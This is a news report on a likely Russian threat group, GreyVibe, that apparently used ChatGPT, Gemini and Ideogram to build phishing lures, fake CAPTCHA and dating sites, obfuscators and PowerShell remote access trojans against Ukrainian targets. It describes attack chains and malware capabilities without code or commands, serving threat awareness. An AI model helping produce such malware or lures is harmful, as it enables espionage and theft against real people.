Russian Hackers Use ChatGPT and Gemini to Build Malware

Key Takeaways

• GreyVibe has run a 10-month cyberespionage campaign targeting Ukrainian organizations using AI-generated content and malware
• The group uses ChatGPT, Gemini, and Ideogram AI to create phishing lures, fake websites, and custom hacking tools
• AI-generated code leaves detectable patterns that security researchers can use to track threat actors

AI as a Force Multiplier for Cyberespionage

A threat group with likely ties to Russia has turned commercial AI tools into weapons. The group, tracked as GreyVibe by cybersecurity firm WithSecure, has been using ChatGPT, Google Gemini, and image generator Ideogram AI to power a cyberespionage campaign against Ukrainian targets since at least August 2025.

WithSecure discovered the activity in January 2026. The researchers found that GreyVibe uses AI not just for writing phishing emails, but for building custom malware, creating realistic fake websites, and generating visual content that makes their lures more convincing.

“The use of AI is clearly lowering the barrier to entry, enabling actors with low-to-moderate technical skill to execute persistent and complex cyberespionage campaigns at scale.”

— WithSecure Research Team

The link to Russian-speaking operators comes from several technical indicators. The malware control panels use Russian language. Code comments are written in Russian. And the command-and-control servers are configured to Moscow time (UTC+3). WithSecure stopped short of calling it a nation-state operation, but noted the campaign aligns with Russian state interests.

Five Attack Chains, One Playbook

GreyVibe runs multiple attack campaigns simultaneously, each with a distinct approach. WithSecure identified five primary attack chains:

• PhantomMail: Spear-phishing emails with malicious ZIP or RAR files delivered through Google Drive and 4sync links. The emails impersonate Ukrainian government, emergency services, telecom, and energy organizations.
• PhantomClick: Fake CAPTCHA pages disguised as Zoom and LAPAS sites. Victims are tricked into running self-infecting commands through fake Cloudflare verification prompts.
• PrincessClub: Fake Ukrainian adult and dating websites that deliver Android spyware (FallSpy) and Windows malware (PhantomRelay, LegionRelay). The operators created fake female Telegram personas and later added WebRTC video calls to capture victims' audio and video.
• DroneLink: Fake Ukrainian military charity websites themed around FPV drones and UAVs. These share infrastructure with the PrincessClub campaigns.
• Nebo: Fake Russian military communications login pages designed to trick Ukrainian military personnel into thinking they're accessing a Russian military terminal.

AI-Built Malware and Obfuscation Tools

The AI assistance goes beyond content creation. WithSecure found that GreyVibe likely used large language models to develop several custom tools. These include LOOKVALPS, LOOKVALJS, DAYLIGHT, and TEASOUP, all obfuscation tools designed to hide malicious code from security software.

The group's primary weapon is LegionRelay, a PowerShell-based remote access trojan that WithSecure believes was built with AI assistance. LegionRelay can steal files, capture screenshots, grab browser credentials, extract data from Telegram and WhatsApp, and set up remote desktop access for the attackers.

A second RAT called PhantomRelay handles system fingerprinting and dynamic script loading. Both tools give GreyVibe persistent access to compromised systems.

AI Leaves a Trail

Here's the twist. The same AI tools that make GreyVibe more productive also make them easier to track. Security researchers identified distinct patterns in AI-generated code and images that function like a digital fingerprint.

Discussion on Reddit's r/cybersecurity and Hacker News has focused on these "AI-native" error patterns. Multiple security professionals noted that while AI speeds up attack development, the structural quirks in AI-generated content give defenders new ways to identify automated attacks.

WithSecure tracked GreyVibe for nearly a year by exploiting these patterns. The group's heavy reliance on AI-generated infrastructure created unique flaws that researchers could follow across campaigns.

What Organizations Should Watch For

GreyVibe's tactics offer a preview of what AI-enhanced attacks look like in practice. The quality of their phishing content is notably high. Emails and websites look professional. The decoy documents are convincing. The fake CAPTCHA pages could fool trained users.

Organizations connected to Ukraine or Ukrainian interests should treat this as an active threat. But the techniques GreyVibe uses will spread. Other groups will adopt similar AI-assisted methods. Security teams everywhere should prepare for phishing campaigns that look more polished and vary more rapidly than traditional attacks.

Frequently Asked Questions

What is GreyVibe?

GreyVibe is a likely Russian threat group discovered by WithSecure that uses AI tools like ChatGPT and Gemini to conduct cyberespionage against Ukrainian organizations. The group has been active since at least August 2025.

How do hackers use ChatGPT for cyberattacks?

GreyVibe uses ChatGPT and similar AI tools to write convincing phishing emails, create fake websites, generate realistic visual content, and develop custom malware and code obfuscation tools.

Can AI-generated malware be detected?

Yes. AI-generated code and content often contain distinctive patterns or structural quirks that security researchers can identify. WithSecure tracked GreyVibe for nearly a year by exploiting these AI fingerprints.

Who is being targeted by GreyVibe?

GreyVibe primarily targets Ukrainian or Ukraine-related organizations across military, government, civilian, and business sectors. Their phishing campaigns impersonate Ukrainian government agencies, energy companies, and telecom providers.

What malware does GreyVibe use?

The group uses several custom tools including LegionRelay and PhantomRelay (PowerShell RATs), FallSpy (Android spyware), and multiple code obfuscators (LOOKVALPS, LOOKVALJS, DAYLIGHT, TEASOUP).

Source: BleepingComputer